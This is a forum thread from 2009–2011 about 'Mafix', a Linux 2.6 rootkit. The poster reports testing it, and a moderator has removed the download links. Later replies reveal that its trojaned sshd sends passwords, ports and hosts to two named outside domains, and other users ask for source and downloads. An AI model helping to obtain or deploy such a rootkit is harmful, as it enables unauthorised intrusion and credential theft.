Government Security
Network Security Resources

Jump to content

Photo

Mafix - Linux 2.6 Rootkit

linux rootkit
  • Please log in to reply
8 replies to this topic

#1 vaf0r

vaf0r

    Private

  • Members
  • 2 posts

Posted 15 July 2009 - 09:10 PM

found this while browsing around some forums
i tested it on a 2.6.18 box and it worked nicely and has a nice layout
did a check for mail functions and couldn't find anything so it seems to be a good release.

Edit by Ryan:
Removed dangerous file URL's and begging for money line.

#2 h4nk

h4nk

    Private

  • Members
  • 2 posts

Posted 16 July 2009 - 09:27 PM

found this while browsing around some forums
i tested it on a 2.6.18 box and it worked nicely and has a nice layout
did a check for mail functions and couldn't find anything so it seems to be a good release.

[code=auto:0]
Edit by Ryan:
Removed dangerous file URL's and begging for money line.


source would be nice?

#3 vaf0r

vaf0r

    Private

  • Members
  • 2 posts

Posted 19 July 2009 - 01:03 AM

source would be nice?


I dont have soruce code for this i am not the creator :wacko:

#4 jswayzy

jswayzy

    Private

  • Members
  • 6 posts

Posted 17 August 2009 - 04:51 AM

there's a backdoor in sshd file - knocks onto:
brock.iroxusux.com/root.php?pass=%s&port=%s
and on brawl.izthewiz.net

So it tells you pass/port there :)
Fuckers!

#5 bonarez

bonarez

    Retired GSO Second Lieutenant

  • Sergeant Major
  • 1,252 posts

Posted 17 August 2009 - 09:59 AM

hehe, nice find jswayzy!!

bit like the rm -rf / thingy from AS in the latest 'sshd eploit' but with varying results..

don't run code you don't understand :lol:
"Ask the right question and you will receive the right answer. I'm just very sensitive about the right syntax"

Read the rules before you post

#6 berz3k

berz3k

    Private First Class

  • Members
  • 70 posts

Posted 28 August 2009 - 06:43 AM

So? the file is dangerous or functional to use?

does any1 have more details?

-berz3k.

#7 jswayzy

jswayzy

    Private

  • Members
  • 6 posts

Posted 28 August 2009 - 10:45 PM

This script tells your pass/ port /host you trojaned to someone elses site. Is it enough?

You can edit ./root file & remove the ./sshd string, but there are maybe other files that knock elsewhere.

Besides, changing binaries - is a shitty way.

#8 Heaven32

Heaven32

    Private

  • Members
  • 1 posts

Posted 01 October 2010 - 11:51 PM

Here is nothing dangerous for use just you have to need complete information about that.
Heaven

#9 ghafil

ghafil

    Private

  • Members
  • 1 posts

Posted 01 November 2011 - 12:36 AM

download link?





Also tagged with one or more of these keywords: linux, rootkit